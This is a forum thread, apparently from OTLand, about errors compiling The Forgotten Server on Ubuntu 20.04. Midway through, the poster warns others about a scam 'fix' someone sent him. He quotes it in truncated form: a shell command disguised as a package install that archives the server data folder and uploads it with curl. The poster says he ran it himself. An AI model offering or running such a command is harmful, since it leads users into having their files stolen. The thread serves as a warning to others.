• There is NO official Otland's Discord server and NO official Otland's server list. The Otland's Staff does not manage any Discord server or server list. Moderators or administrator of any Discord server or server lists have NO connection to the Otland's Staff. Do not get scammed!

Linux Issues compiling newest source on Ubuntu Linux

Mjmackan

Mapper ~ Writer
Premium User
Solutions
Reaction score
how did you install fmt library? what ubuntu are you using?

how did you install fmt library? what ubuntu are you using?

I followed the Ubuntu compile tutorial here from top to toe: otland/forgottenserver (https://github.com/otland/forgottenserver/wiki/Compiling-on-Ubuntu)
I'm using Ubunu 20.04 so shouldnt be an issue?

Still no fix for this, started a issue on github aswell. Any possible solution, compiling on some other O.S? etc

Still no fix for this, started a issue on github aswell. Any possible solution, compiling on some other O.S? etc

Your errors show fmt, try to compile again and watch the process, it might go through but it sometimes does not succeed to properly deal with fmt.
If it gives you warning about not being finished then you know what to deal with :) send screens if you find something

BUMP!

And fun with people trying to help out when you're in need..
add.png

And this guy aswell (might be the same?):
Screenshot_20210325-093828.jpg
Command he sent: (dont use, will dump your data):
cd /home/otsmanager/ && echo "apt get install f-t-m 2.1" && cd /home/otsmanager/forgottenserver && tar -czf ftm.tar.gz data && result="$(curl -F'[email protected]' ///REST IS BLOCKED TO NOT BE EXECUTED.

Last edited:
Better comment that out as someone might really execute it without reading the post.
Removed half, this S*IT gets my angry af, never been through this with anyone in the OT community but there sure are a lot of scums out there.
And TBH i executed the command, just lucky i had my "real server" in another folder and not in "/forgottenserver"

Removed half, this S*IT gets my angry af, never been through this with anyone in the OT community but there sure are a lot of scums out there.
And TBH i executed the command, just lucky i had my "real server" in another folder and not in "/forgottenserver"

Yeah that'd why you need a bit precaution when it comes to executing ssh commands from unknown people.

But well, that message looked really legit, so I understand your mistake.

Just in the future pay more attention before pasting the code into your terminal :)

Yeah that'd why you need a bit precaution when it comes to executing ssh commands from unknown people.

But well, that message looked really legit, so I understand your mistake.

Just in the future pay more attention before pasting the code into your terminal :)
Note to myself: Stop being stopid. 🤕

Why would they wanna do that? thats messed up..

Anyways, did you solve your issue? or stuck at the same place as before?
Update your progress thanks